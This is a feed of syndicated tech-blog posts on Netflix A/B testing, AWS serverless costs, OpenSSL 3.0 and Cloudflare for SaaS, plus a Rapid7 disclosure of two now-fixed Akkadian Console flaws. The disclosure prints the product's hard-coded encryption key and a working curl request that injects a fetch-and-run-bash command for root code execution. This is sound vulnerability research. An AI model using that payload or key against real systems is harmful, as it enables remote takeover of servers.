Post Syndicated from Crosstalk Solutions original https://www.youtube.com/watch?v=CABwwIrnbyY

Decision Making at Netflix

Post Syndicated from Netflix Technology Blog original https://netflixtechblog.com/decision-making-at-netflix-33065fa06481

Martin Tingley with Wenjing Zheng, Simon Ejdemyr, Stephanie Lane, and Colin McFarland

This introduction is the first in a multi-part series on how Netflix uses A/B tests to make decisions that continuously improve our products, so we can deliver more joy and satisfaction to our members. Subsequent posts will cover the basic statistical concepts underpinning A/B tests, the role of experimentation across Netflix, how Netflix has invested in infrastructure to support and scale experimentation, and the importance of the culture of experimentation within Netflix.

Netflix was created with the idea of putting consumer choice and control at the center of the entertainment experience, and as a company we continuously evolve our product offerings to improve on that value proposition. For example, the Netflix UI has undergone a complete transformation over the last decade. Back in 2010, the UI was static, with limited navigation options and a presentation inspired by displays at a video rental store. Now, the UI is immersive and video-forward, the navigation options richer but less obtrusive, and the box art presentation takes greater advantage of the digital experience.

Transitioning from that 2010 experience to what we have today required Netflix to make countless decisions. What’s the right balance between a large display area for a single title vs showing more titles? Are videos better than static images? How do we deliver a seamless video-forward experience on constrained networks? How do we select which titles to show? Where do the navigation menus belong and what should they contain? The list goes on.

Making decisions is easy — what’s hard is making the right decisions. How can we be confident that our decisions are delivering a better product experience for current members and helping grow the business with new members? There are a number of ways Netflix could make decisions about how to evolve our product to deliver more joy to our members:

- Let leadership make all the decisions.

- Hire some experts in design, product management, UX, streaming delivery, and other disciplines — and then go with their best ideas.

- Have an internal debate and let the viewpoints of our most charismatic colleagues carry the day.

- Copy the competition.

In each of these paradigms, a limited number of viewpoints and perspectives contribute to the decision. The leadership group is small, group debates can only be so big, and Netflix has only so many experts in each domain area where we need to make decisions. And there are maybe a few tens of streaming or related services that we could use as inspiration. Moreover, these paradigms don’t provide a systematic way to make decisions or resolve conflicting viewpoints.

At Netflix, we believe there’s a better way to make decisions about how to improve the experience we deliver to our members: we use A/B tests. Experimentation scales. Instead of small groups of executives or experts contributing to a decision, experimentation gives all our members the opportunity to vote, with their actions, on how to continue to evolve their joyful Netflix experience.

More broadly, A/B testing, along with other causal inference methods like quasi-experimentation, is one of the ways that Netflix uses the scientific method to inform decision making. We form hypotheses, gather empirical data, including from experiments, that provide evidence for or against our hypotheses, and then draw conclusions and generate new hypotheses. As explained by my colleague Nirmal Govind, experimentation plays a critical role in the iterative cycle of deduction (drawing specific conclusions from a general principle) and induction (formulating a general principle from specific results and observations) that underpins the scientific method.

Curious to learn more? Follow the Netflix Tech Blog for future posts that will dive into the details of A/B tests and how Netflix uses tests to inform decision making.

Decision Making at Netflix was originally published in Netflix TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/868569/rss

Security updates have been issued by openSUSE (apache2, java-11-openjdk, libesmtp, nodejs10, ntfs-3g_ntfsprogs, openssl-1_1, xen, and xerces-c), Red Hat (kernel-rt and kpatch-patch), and SUSE (ntfs-3g_ntfsprogs and openssl-1_1).

Building well-architected serverless applications: Optimizing application costs

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/building-well-architected-serverless-applications-optimizing-application-costs/

This series of blog posts uses the AWS Well-Architected Tool with the Serverless Lens to help customers build and operate applications using best practices. In each post, I address the serverless-specific questions identified by the Serverless Lens along with the recommended best practices. See the introduction post for a table of contents and explanation of the example application.

COST 1. How do you optimize your serverless application costs?

Design, implement, and optimize your application to maximize value. Asynchronous design patterns and performance practices ensure efficient resource use and directly impact the value per business transaction. By optimizing your serverless application performance and its code patterns, you can directly impact the value it provides, while making more efficient use of resources.

Serverless architectures are easier to manage in terms of correct resource allocation compared to traditional architectures. Due to its pay-per-value pricing model and scale based on demand, a serverless approach effectively reduces the capacity planning effort. As covered in the operational excellence and performance pillars, optimizing your serverless application has a direct impact on the value it produces and its cost. For general serverless optimization guidance, see the AWS re:Invent talks, “Optimizing your Serverless applications” Part 1 and Part 2, and “Serverless architectural patterns and best practices”.

Required practice: Minimize external calls and function code initialization

AWS Lambda functions may call other managed services and third-party APIs. Functions may also use application dependencies that may not be suitable for ephemeral environments. Understanding and controlling what your function accesses while it runs can have a direct impact on value provided per invocation.

Review code initialization

I explain the Lambda initialization process with cold and warm starts in “Optimizing application performance – part 1”. Lambda reports the time it takes to initialize application code in Amazon CloudWatch Logs. As Lambda functions are billed by request and duration, you can use this to track costs and performance. Consider reviewing your application code and its dependencies to improve the overall execution time to maximize value.

You can take advantage of Lambda execution environment reuse to make external calls to resources and use the results for subsequent invocations. Use TTL mechanisms inside your function handler code. This avoids repeated external calls, which add execution time, while still refreshing cached data before it becomes stale.

Review third-party application deployments and permissions

When using Lambda layers or applications provisioned by AWS Serverless Application Repository, be sure to understand any associated charges that these may incur. When deploying functions packaged as container images, understand the charges for storing images in Amazon Elastic Container Registry (ECR).

Ensure that your Lambda function only has access to what its application code needs. Regularly review that your function has a predicted usage pattern so you can factor in the cost of other services, such as Amazon S3 and Amazon DynamoDB.

Required practice: Optimize logging output and its retention

Consider reviewing your application logging level. Ensure that logging output and log retention are appropriately set to your operational needs to prevent unnecessary logging and data retention. This helps you have the minimum of log retention to investigate operational and performance inquiries when necessary.

Emit and capture only what is necessary to understand and operate your component as intended.

With Lambda, any standard output statements are sent to CloudWatch Logs. Capture and emit business and operational events that are necessary to help you understand your function, its integration, and its interactions. Use a logging framework and environment variables to dynamically set a logging level. When applicable, sample debugging logs for a percentage of invocations.
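One way to set the level dynamically and sample debug logs is sketched below with only the Python standard library. The `DEBUG_SAMPLE_RATE` variable name and the `choose_level` helper are assumptions for this sketch. The example application uses Lambda Powertools rather than this hand-rolled approach.

```python
import logging
import os
import random

# LOG_LEVEL matches the variable used in this post; DEBUG_SAMPLE_RATE is hypothetical.
LOG_LEVEL = os.environ.get("LOG_LEVEL", "INFO")
DEBUG_SAMPLE_RATE = float(os.environ.get("DEBUG_SAMPLE_RATE", "0.0"))

logging.basicConfig()
logger = logging.getLogger("booking")


def choose_level(level_name, sample_rate, sample=random.random):
    """Return the configured level, or DEBUG for a sampled fraction of invocations."""
    level = getattr(logging, level_name.upper(), None)
    if not isinstance(level, int):
        level = logging.INFO  # fall back when the name is not a known level
    if sample() < sample_rate:
        level = logging.DEBUG
    return level


def lambda_handler(event, context):
    logger.setLevel(choose_level(LOG_LEVEL, DEBUG_SAMPLE_RATE))
    logger.debug("full event: %s", event)  # emitted only for sampled invocations
    logger.info("booking confirmed")
    return {"status": "ok"}
```

With a sample rate of 0.1, roughly one invocation in ten logs at DEBUG and the rest stay at the configured level, which keeps ingestion volume predictable.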

In the serverless airline example used in this series, the booking service Lambda functions use Lambda Powertools as a logging framework with output structured as JSON.

Lambda Powertools is added to the Lambda functions as a shared Lambda layer in the AWS Serverless Application Model (AWS SAM) template. The layer ARN is stored in Systems Manager Parameter Store.

    Parameters:
        SharedLibsLayer:
            Type: AWS::SSM::Parameter::Value<String>
            Description: Project shared libraries Lambda Layer ARN
    Resources:
        ConfirmBooking:
            Type: AWS::Serverless::Function
            Properties:
                FunctionName: !Sub ServerlessAirline-ConfirmBooking-${Stage}
                Handler: confirm.lambda_handler
                CodeUri: src/confirm-booking
                Layers:
                    - !Ref SharedLibsLayer
                Runtime: python3.7
    …

The LOG_LEVEL and other Powertools settings are configured in the Globals section as Lambda environment variables for all functions.

    Globals:
        Function:
            Environment:
                Variables:
                    POWERTOOLS_SERVICE_NAME: booking
                    POWERTOOLS_METRICS_NAMESPACE: ServerlessAirline
                    LOG_LEVEL: INFO

For Amazon API Gateway, there are two types of logging in CloudWatch: execution logging and access logging. Execution logs contain information that you can use to identify and troubleshoot API errors. API Gateway manages the CloudWatch Logs, creating the log groups and log streams. Access logs contain details about who accessed your API and how they accessed it. You can create your own log group or choose an existing log group that could be managed by API Gateway.

Enable access logs, and selectively review the output format and request fields that might be necessary. For more information, see “Setting up CloudWatch logging for a REST API in API Gateway”.

Enable AWS AppSync logging, which uses CloudWatch to monitor and debug requests. You can configure two types of logging: request-level and field-level. For more information, see “Monitoring and Logging”.

Define and set a log retention strategy

Define a log retention strategy to satisfy your operational and business needs. Set log expiration for each CloudWatch log group, because logs are kept indefinitely by default.

For example, in the booking service AWS SAM template, log groups are explicitly created for each Lambda function with a parameter specifying the retention period.

    Parameters:
        LogRetentionInDays:
            Type: Number
            Default: 14
            Description: CloudWatch Logs retention period
    Resources:
        ConfirmBookingLogGroup:
            Type: AWS::Logs::LogGroup
            Properties:
                LogGroupName: !Sub "/aws/lambda/${ConfirmBooking}"
                RetentionInDays: !Ref LogRetentionInDays

The Serverless Application Repository application auto-set-log-group-retention can update the retention policy for new and existing CloudWatch log groups to the specified number of days.

For log archival, you can export CloudWatch Logs to S3 and store them in Amazon S3 Glacier for more cost-effective retention. You can use CloudWatch Logs subscriptions for custom processing, analysis, or loading to other systems. Lambda extensions allow you to process, filter, and route logs directly from Lambda to a destination of your choice.

Good practice: Optimize function configuration to reduce cost

Benchmark your function using different memory sizes

For Lambda functions, memory is the capacity unit for controlling the performance and cost of a function. You can configure the amount of memory allocated to a Lambda function, between 128 MB and 10,240 MB. The amount of memory also determines the amount of virtual CPU available to a function. Benchmark your AWS Lambda functions with differing amounts of memory allocated. Adding more memory and proportional CPU may lower the duration and reduce the cost of each invocation.
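The trade-off can be worked through with simple arithmetic: the duration charge for one invocation is the allocated memory in GB, multiplied by the billed seconds, multiplied by the price per GB-second. The sketch below uses an assumed price and made-up benchmark durations, so treat the numbers as placeholders and check current Lambda pricing for your Region and architecture. It also ignores the per-request charge, which does not vary with memory size.

```python
# Assumed price per GB-second; verify against current Lambda pricing.
PRICE_PER_GB_SECOND = 0.0000166667


def invocation_cost(memory_mb, duration_ms, price=PRICE_PER_GB_SECOND):
    """Duration charge for one invocation: GB allocated x seconds billed x price."""
    return (memory_mb / 1024) * (duration_ms / 1000) * price


# Hypothetical benchmark results: memory size (MB) -> average duration (ms).
measurements = {128: 2400, 512: 520, 1024: 250, 2048: 240}

costs = {mb: invocation_cost(mb, ms) for mb, ms in measurements.items()}
cheapest = min(costs, key=costs.get)

for mb in sorted(costs):
    per_million = costs[mb] * 1_000_000
    print(f"{mb:>5} MB  {measurements[mb]:>5} ms  ${per_million:.2f} per million invocations")
print(f"cheapest configuration: {cheapest} MB")
```

In this made-up data set, moving from 128 MB to 1,024 MB makes each invocation both faster and cheaper, while 2,048 MB adds cost for almost no speedup. Real functions need real measurements.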

In “Optimizing application performance – part 2”, I cover using AWS Lambda Power Tuning to automate the memory testing process to balance performance and cost.

Best practice: Use cost-aware usage patterns in code

Reduce the time your function runs by reducing job-polling or task coordination. This avoids overpaying for unnecessary compute time.

Decide whether your application can fit an asynchronous pattern

Avoid scenarios where your Lambda functions wait for external activities to complete. I explain the difference between synchronous and asynchronous processing in “Optimizing application performance – part 1”. You can use asynchronous processing to aggregate queues, streams, or events for more efficient processing time per invocation. This reduces wait times and latency from requesting apps and functions.

Long polling or waiting increases the costs of Lambda functions and also reduces overall account concurrency. This can impact the ability of other functions to run.

Consider using other services such as AWS Step Functions to help reduce code and coordinate asynchronous workloads. You can build workflows using state machines with long polling and failure handling. Step Functions also supports direct service integrations, such as DynamoDB, without having to use Lambda functions.

In the serverless airline example used in this series, Step Functions is used to orchestrate the Booking microservice. The ProcessBooking state machine handles all the necessary steps to create bookings, including payment.

To reduce costs and improve performance with CloudWatch, create custom metrics asynchronously. You can use the Embedded Metrics Format to write logs, rather than the PutMetricData API call. I cover using the embedded metrics format in “Understanding application health” – part 1 and part 2.
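To show what such a structured log entry looks like, here is a hand-built sketch of an embedded metric format record. The helper name `emf_record` and the `service` dimension are assumptions for illustration. The example application relies on Lambda Powertools to produce these records rather than building them by hand.

```python
import json
import time


def emf_record(namespace, service, metric_name, value, unit="Count"):
    """Build one structured log record in the embedded metric format."""
    return {
        "_aws": {
            "Timestamp": int(time.time() * 1000),  # milliseconds since the epoch
            "CloudWatchMetrics": [
                {
                    "Namespace": namespace,
                    "Dimensions": [["service"]],
                    "Metrics": [{"Name": metric_name, "Unit": unit}],
                }
            ],
        },
        # Dimension and metric values live at the top level of the record.
        "service": service,
        metric_name: value,
    }


def lambda_handler(event, context):
    # Standard output goes to CloudWatch Logs, so no metrics API call is made here.
    record = emf_record("ServerlessAirline", "booking", "BookingSuccessful", 1)
    print(json.dumps(record))
    return {"status": "ok"}
```

Because the metric travels inside a log line, the function does not wait on a synchronous metrics API call during the invocation.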

For example, once a booking is made, the logs are visible in the CloudWatch console. You can select a log stream and find the custom metric as part of the structured log entry.

CloudWatch automatically creates metrics from these structured logs. You can create graphs and alarms based on them. For example, here is a graph based on a BookingSuccessful custom metric.

Consider asynchronous invocations and review runaway functions where applicable

Take advantage of Lambda’s event-based model. Lambda functions can be triggered based on events ingested into Amazon Simple Queue Service (SQS) queues, S3 buckets, and Amazon Kinesis Data Streams. AWS manages the polling infrastructure on your behalf at no additional cost. Avoid code that polls third-party software as a service (SaaS) providers. Instead, use Amazon EventBridge to integrate with SaaS providers when possible.

Carefully consider and review recursion, and establish timeouts to prevent runaway functions.

Conclusion

Design, implement, and optimize your application to maximize value. Asynchronous design patterns and performance practices ensure efficient resource use and directly impact the value per business transaction. By optimizing your serverless application performance and its code patterns, you can reduce costs while making more efficient use of resources.

In this post, I cover minimizing external calls and function code initialization. I show how to optimize logging output with the embedded metrics format, and log retention. I recap optimizing function configuration to reduce cost and highlight the benefits of asynchronous event-driven patterns.

This post wraps up the series, building well-architected serverless applications, where I cover the AWS Well-Architected Tool with the Serverless Lens. See the introduction post for links to all the blog posts.

For more serverless learning resources, visit Serverless Land.

Foscam DBW5 Video Doorbell FAIL | Wheels fell off?

Post Syndicated from digiblurDIY original https://www.youtube.com/watch?v=u9QEvfqd3rI

OpenSSL 3.0.0 released

Post Syndicated from original https://lwn.net/Articles/868536/rss

Version 3.0 of the OpenSSL TLS library has been released; the large version-number jump (from 1.1.1) reflects a new versioning scheme.

Most applications that worked with OpenSSL 1.1.1 will still work unchanged and will simply need to be recompiled (although you may see numerous compilation warnings about using deprecated APIs). Some applications may need to make changes to compile and work correctly, and many applications will need to be changed to avoid the deprecations warnings. We have put together a migration guide to describe the major differences in OpenSSL 3.0 compared to previous releases.

OpenSSL has also been relicensed to Apache 2.0, which should end the era of “special exceptions” needed to use OpenSSL in GPL-licensed applications. See this blog entry and the changelog for more information.

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/

![CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](https://blog.rapid7.com/content/images/2021/09/akkadian-vuln.jpg)

Over the course of routine security research, Rapid7 researchers Jonathan Peterson, Cale Black, William Vu, and Adam Cammack discovered that the Akkadian Console (often referred to as “ACO”) version 4.7, a call manager solution, is affected by two vulnerabilities. The first, CVE-2021-35468, allows root system command execution with a single authenticated POST request. The second, CVE-2021-35467, allows for the decryption of data encrypted by the application, which results in the arbitrary creation of sessions and the uncovering of any other sensitive data stored within the application. Combined, these vulnerabilities could allow an unauthenticated attacker to gain remote root privileges on a vulnerable instance of Akkadian Console Server.

| CVE Identifier | CWE Identifier | Base CVSS score (Severity) | Remediation |
|---|---|---|---|
| CVE-2021-35467 | CWE-321: Use of Hard-Coded Cryptographic Key | | Fixed in Version 4.9 |
| CVE-2021-35468 | CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) | | Fixed in Version 4.9 |

Product Description

Akkadian Console (ACO) is a call management system allowing users to handle incoming calls with a centralized management web portal. More information is available at the vendor site for ACO.

Credit

These issues were discovered by Jonathan Peterson (@deadjakk), Cale Black, William Vu, and Adam Cammack, all of Rapid7, and they are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The following were observed and tested on the Linux build of the Akkadian Console Server, version 4.7.0 (build 1f7ad4b) (date of creation: Feb 2 2021 per naming convention).

CVE-2021-35467: Akkadian Console Server Hard-Coded Encryption Key

Using DnSpy to decompile the bytecode of ‘acoserver.dll’ on the Akkadian Console virtual appliance, Rapid7 researchers identified that the Akkadian Console was using a static encryption key, “0c8584b9-020b-4db4-9247-22dd329d53d7”, for encryption and decryption of sensitive data. Specifically, researchers observed at least the following data encrypted using this hardcoded string:

- User sessions (the most critical of the set, as outlined below)

- FTP Passwords

- LDAP credentials

- SMTP credentials

- Miscellaneous service credentials

The string constant that is used to encrypt/decrypt this data is hard-coded into the ‘primary’ C# library. So anyone that knows the string, or can learn the string by interrogating a shipping version of ‘acoserver.dll’ of the server, is able to decrypt and recover these values.

In addition to being able to recover the saved credentials of various services, Rapid7 researchers were able to write encrypted user sessions for the Akkadian Console management portal with arbitrary data, granting access to administrative functionality of the application.

![CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](https://blog.rapid7.com/content/images/2021/09/image5.jpg)

The TokenService of acoserver.dll uses a hardcoded string to encrypt and decrypt user session information, as well as other data in the application that uses the ‘Encrypt’ method.

As shown in the function below, the application makes use of an ECB cipher, as well as PKCS7 padding to decrypt (and encrypt) this sensitive data.

![CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](https://blog.rapid7.com/content/images/2021/09/image3-1.png)

The image below shows an encrypted and decrypted version of an ‘Authorization’ header displaying possible variables available for manipulation. Using a short python script, one is able to create a session token with arbitrary values and then use it to connect to the Akkadian web console as an authenticated user.

![CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](https://blog.rapid7.com/content/images/2021/09/image4-1.png)

Using the decrypted values of a session token, a ‘custom’ token can be created, substituting whatever values we want with a recent timestamp to successfully authenticate to the web portal.

The figure below shows this technique being used to issue a request to a restricted web endpoint that responds with the encrypted passwords of the user account. Since the same password is used to encrypt most things in the application (sessions, saved passwords for FTP, backups, LDAP, etc.), we can decrypt the encrypted passwords sent back in the response by certain portions of the application:

![CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](https://blog.rapid7.com/content/images/2021/09/image2-1.png)

This vulnerability can be used with the next vulnerability, CVE-2021-35468, to achieve remote command execution.

CVE-2021-35468: Akkadian Console Server OS Command Injection

The Akkadian Console application provides SSL certificate generation. See the corresponding web form in the screenshot below:

![CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](https://blog.rapid7.com/content/images/2021/09/image6.png)

The way the application generates these certificates is by issuing a system command using ‘/bin/bash’ to run an unsanitized ‘openssl’ command constructed from the parameters of the user’s request.

The screenshot below shows this portion of the code as it exists within the decompiled ‘acoserver.dll’.

![CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](https://blog.rapid7.com/content/images/2021/09/image1-2.png)
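For readers who maintain similar code, the underlying flaw is generic: request fields are interpolated into a string that a shell then interprets. The sketch below contrasts that pattern with building an argument list. It runs nothing, and the `openssl` arguments are hypothetical stand-ins rather than the command ACO actually constructs.

```python
import shlex


def unsafe_command(organization):
    """Mimics the flawed pattern: user input interpolated into a shell string."""
    return f'openssl req -new -subj "/O={organization}"'


def safe_argv(organization):
    """Builds an argument list meant to be run without a shell."""
    return ["openssl", "req", "-new", "-subj", f"/O={organization}"]


payload = ";;;`id`;;"

# Passed to a shell, the backticks inside the double quotes would be evaluated.
print(unsafe_command(payload))

# As a list element, the payload stays inert data inside a single argument.
print(safe_argv(payload))

# If a shell string is truly unavoidable, quote every interpolated value.
print(shlex.quote(payload))
```

Passing an argument list to a process API that does not invoke a shell, combined with validating each field against an allowlist, removes this class of bug.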

Side Note: In newer versions (likely 4.7+), this “Authorization” header is actually validated. In older versions of the Akkadian Console, this API endpoint does not appear to actually enforce authorization and instead only checks for the presence of the “Authorization” header. Therefore in these older, affected versions, this endpoint and the related vulnerability could be accessed directly without the crafting of the header using CVE-2021-35467. Exact affected versions have not been researched.

The curl command below causes the Akkadian Console server to run a curl command of its own (injected through the Organization field) and pipe the results to bash.

    curl -i -s -k -X $'POST' \
        -H $'Host: 192.168.200.216' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0' -H $'Authorization: <OMITTED>' -H $'Content-Type: application/json' -H $'Content-Length: 231' \
        --data-binary $'{\"AlternativeNames\": [\"assdf.com\", \"asdf.com\"], \"CommonName\": \"mydomano.com\", \"Country\": \"US\", \"State\": \";;;;;`\", \"City\": \";;;``;;`\", \"Organization\": \";;;`curl 192.168.200.1/payload|bash`;;`\", \"OrganizationUnit\": \";;\", \"Email\": \"\"}' \
        $'https://192.168.200.216/api/acoweb/generateCertificate'

Once ACO receives this request, it executes the injected curl payload and spawns a shell. Any other operating system command could be executed the same way.

Impact

CVE-2021-35467, by itself, can be exploited to allow an unauthenticated user administrative access to the application. Given that this device supports LDAP-related functionality, an attacker could then leverage this access to pivot to other assets in the organization through Active Directory, using stored LDAP accounts.

CVE-2021-35468 could allow any authenticated user to execute operating system level commands with root privileges.

By combining CVE-2021-35467 and CVE-2021-35468, an unauthenticated user can first establish themselves as an authenticated user by crafting an arbitrary session, then execute commands on ACO’s host operating system as root. From there, the attacker can install any malicious software of their choice on the affected device.

Remediation

Users of Akkadian Console should update to 4.9, which has addressed these issues. In the absence of an upgrade, users of Akkadian Console version 4.7 or older should only expose the web interface to trusted networks — notably, not the internet.

Disclosure Timeline

- April, 2021: Discovery by Jonathan Peterson and friends at Rapid7

- Wed, Jun 16, 2021: Initial disclosure to the vendor

- Wed, Jun 23, 2021: Updated details disclosed to the vendor

- Tue, Jul 13, 2021: Vendor indicated that version 4.9 fixed the issues

- Tue, Aug 3, 2021: Vendor provided a link to release notes for 4.9

- Tue, Sep 7, 2021: Disclosure published

What’s new with Cloudflare for SaaS?

Post Syndicated from Dina Kozlov original https://blog.cloudflare.com/whats-new-with-cloudflare-for-saas/

This past April, we announced the Cloudflare for SaaS Beta which makes our SSL for SaaS product available to everyone. This allows any customer — from first-time developers to large enterprises — to use Cloudflare for SaaS to extend our full product suite to their own customers. SSL for SaaS is the subset of Cloudflare for SaaS features that focus on a customer’s Public Key Infrastructure (PKI) needs.

Today, we’re excited to announce all the customizations that our team has been working on for our Enterprise customers — for both Cloudflare for SaaS and SSL for SaaS.

Let’s start with the basics — the common SaaS setup



If you’re running a SaaS company, your solution might exist as a subdomain of your SaaS website, e.g. template.<mysaas>.com, but ideally, your solution would allow the customer to use their own vanity hostname for it, such as example.com.

The most common way to begin using a SaaS company’s service is to point a CNAME DNS record to the subdomain that the SaaS provider has created for your application. This ensures traffic gets to the right place, and it allows the SaaS provider to make infrastructure changes without involving your end customers.

We kept this in mind when we built our SSL for SaaS a few years ago. SSL for SaaS takes away the burden of certificate issuance and management from the SaaS provider by proxying traffic through Cloudflare’s edge. All the SaaS provider needs to do is onboard their zone to Cloudflare and ask their end customers to create a CNAME to the SaaS zone — something they were already doing.

The big benefit of giving your customers a CNAME record (instead of a fixed IP address) is that it gives you, the SaaS provider, more flexibility and control. It allows you to seamlessly change the IP address of your server in the background. For example, if your IP gets blocked by ISPs, you can update that address on your customers’ behalf with a CNAME record. With a fixed A record, you rely on each of your customers to make a change.



While the CNAME record works great for most customers, some came back and wanted to bypass the limitation that CNAME records present. RFC 1912 states that CNAME records cannot coexist with other DNS records, so in most cases, you cannot have a CNAME at the root of your domain, e.g. example.com, where SOA and NS records must already exist. Instead, the CNAME needs to exist at the subdomain level, e.g. www.example.com. Some DNS providers (including Cloudflare) work around this restriction through a method called CNAME flattening.
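The coexistence rule is easy to check mechanically. The following sketch flags any name in a list of records where a CNAME shares the name with another record type. The function name and the sample zone are assumptions for illustration, and the check is simplified: it ignores the DNSSEC record types that are permitted alongside a CNAME.

```python
from collections import defaultdict


def cname_conflicts(records):
    """Return names where a CNAME shares the name with any other record type."""
    types_by_name = defaultdict(set)
    for name, rtype in records:
        types_by_name[name.lower().rstrip(".")].add(rtype.upper())
    return sorted(
        name
        for name, types in types_by_name.items()
        if "CNAME" in types and len(types) > 1
    )


zone = [
    ("example.com", "SOA"),
    ("example.com", "NS"),
    ("example.com", "CNAME"),      # conflicts with the SOA and NS at the apex
    ("www.example.com", "CNAME"),  # fine: nothing else lives at this name
]
print(cname_conflicts(zone))
```

The apex is flagged because every zone carries SOA and NS records there, which is why a plain CNAME cannot be used at example.com itself.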

Since SaaS providers have no control over the DNS provider that their customers are using, the feedback they got from their customers was that they wanted to use the apex of their zone and not the subdomain. So when our SaaS customers came back asking us for a solution, we delivered. We call it Apex Proxying.

Apex Proxying

For our SaaS customers who want to allow their customers to proxy their apex to their zone, regardless of which DNS provider they are using, we give them the option of Apex Proxying. Apex Proxying is an SSL for SaaS feature that gives SaaS providers a pair of IP addresses to provide to their customers when CNAME records do not work for them.

Cloudflare starts by allocating a dedicated set of IPs for the SaaS provider. The SaaS provider then gives their customers these IPs that they can add as A or AAAA DNS records, allowing them to proxy traffic directly from the apex of their zone.

While this works for most, some of our customers want more flexibility. They want to have multiple IPs that they can change, or they want to assign different sets of customers to different buckets of IPs. For those customers, we give them the option to bring their own IP range, so they control the IP allocation for their application.

Bring Your Own IPs



Last year, we announced Bring Your Own IP (BYOIP), which allows customers to bring their own IP range for Cloudflare to announce at our edge. One of the benefits of BYOIP is that it allows SaaS customers to allocate that range to their account and then, instead of having a few IPs that their customers can point to, they can distribute all the IPs in their range.

SaaS customers often require granular control of how their IPs are allocated to different zones that belong to different customers. With 256 IPs to use, you have the flexibility to either group customers together or to give them dedicated IPs. It’s up to you!
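Both allocation styles can be sketched with Python's `ipaddress` module. The prefix below is a documentation range standing in for a customer-owned /24, and the customer names and helper functions are hypothetical. How addresses are actually assigned to zones is done through Cloudflare, not through code like this.

```python
import ipaddress

# 192.0.2.0/24 is a documentation range standing in for a customer-owned prefix.
prefix = ipaddress.ip_network("192.0.2.0/24")
addresses = list(prefix)  # all 256 addresses in the /24


def dedicated(customers):
    """Give each customer its own address."""
    if len(customers) > len(addresses):
        raise ValueError("more customers than addresses")
    return {c: str(ip) for c, ip in zip(customers, addresses)}


def grouped(customers, group_size):
    """Share one address among each group of group_size customers."""
    groups_needed = -(-len(customers) // group_size)  # ceiling division
    if groups_needed > len(addresses):
        raise ValueError("more groups than addresses")
    return {c: str(addresses[i // group_size]) for i, c in enumerate(customers)}


customers = ["acme", "globex", "initech"]
print(dedicated(customers))
print(grouped(customers, group_size=2))
```

Dedicated addresses isolate customers from each other, while grouping stretches the same range across many more customers.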

While we’re on the topic of grouping customers, let’s talk about how you might want to do this when sending traffic to your origin.

Custom Origin Support

When setting up Cloudflare for SaaS, you indicate your fallback origin, which defines the origin that all of your Custom Hostnames are routed to. This origin can be defined by an IP address or point to a load balancer defined in the zone. However, you might not want to route all customers to the same origin. Instead, you want to route different customers (or custom hostnames) to different origins — either because you want to group customers together or to help you scale the origins supporting your application.

Our Enterprise customers can now choose a custom origin that is not the default fallback origin for any of their Custom Hostnames. Traditionally, this has been done by emailing your account manager and requesting custom logic at Cloudflare’s edge, a very cumbersome and outdated practice. But now, customers can easily indicate this in the UI or in their API requests.



Wildcard Support

Oftentimes, SaaS providers have customers that don’t just want their domain to stay protected and encrypted, but also the subdomains that fall under it.

We wanted to give our Enterprise customers the flexibility to extend this benefit to their end customers by offering wildcard support for Custom Hostnames.

Wildcard Custom Hostnames extend the Custom Hostname’s configuration from a specific hostname — e.g. “blog.example.com” — to the next level of subdomains of that hostname, e.g. “*.blog.example.com”.

To create a Custom Hostname with a wildcard, either select Enable wildcard support when creating the Custom Hostname in the Cloudflare dashboard, or set wildcard: “true” when creating it through the API.
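As a rough illustration of the API route, the sketch below builds a JSON body for a Custom Hostname creation request with wildcard support turned on. The endpoint path in the comment, the placement of `wildcard` inside the `ssl` object, the `method` and `type` values, and the helper name `build_custom_hostname_body` are assumptions made for illustration; check the Cloudflare API reference before relying on them. Nothing is sent over the network.

```python
import json


def build_custom_hostname_body(hostname: str, wildcard: bool = False) -> str:
    """Return a JSON request body for creating a Custom Hostname (assumed shape)."""
    body = {
        "hostname": hostname,
        "ssl": {
            "method": "http",  # assumed validation method
            "type": "dv",      # assumed certificate type
            "wildcard": wildcard,
        },
    }
    return json.dumps(body, indent=2)


# Hypothetical target: POST /zones/<zone_id>/custom_hostnames
print(build_custom_hostname_body("blog.example.com", wildcard=True))
```

With `wildcard=True`, the configuration for “blog.example.com” would also be expected to cover “*.blog.example.com”, as described above.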

Now let’s switch gears to TLS certificate management and the improvements our team has been working on.

TLS Management for All

SSL for SaaS was built to reduce the burden of certificate management for SaaS providers. The initial functionality was meant to serve most customers and their need to issue, maintain, and renew certificates on their customers’ behalf. But one size does not fit all, and some of our customers have more specific needs for their certificate management — and we want to make sure we accommodate them.

CSR Support/Custom certs

One of the superpowers of SSL for SaaS is that it allows Cloudflare to manage all the certificate issuance and renewals on behalf of our customers and their customers. However, some customers want to allow their end customers to upload their own certificates.

For example, a bank may only trust certain certificate authorities (CAs) for their certificate issuance. Alternatively, the SaaS provider may have initially built out TLS support for their customers and now their customers expect that functionality to be available. Regardless of the reasoning, we have given our customers a few options that satisfy these requirements.

For customers who want to maintain control over their TLS private keys or give their customers the flexibility to use their certification authority (CA) of choice, we allow the SaaS provider to upload their customer’s certificate.

If you are a SaaS provider and one of your customers does not allow third parties to generate keys on their behalf, then you want to allow that customer to upload their own certificate. Cloudflare allows SaaS providers to upload their customers’ certificates to any of their custom hostnames — in just one API call!

Some SaaS providers never want a person to see private key material, but want to be able to use the CA of their choice. They can do so by generating a Certificate Signing Request (CSR) for their Custom Hostnames, and then either use those CSRs themselves to order certificates for their customers or relay the CSRs to their customers so that they can provision their own certificates. In either case, the SaaS provider is able to then upload the certificate for the Custom Hostname after the certificate has been issued from their customer’s CA for use at Cloudflare’s edge.

Custom Metadata

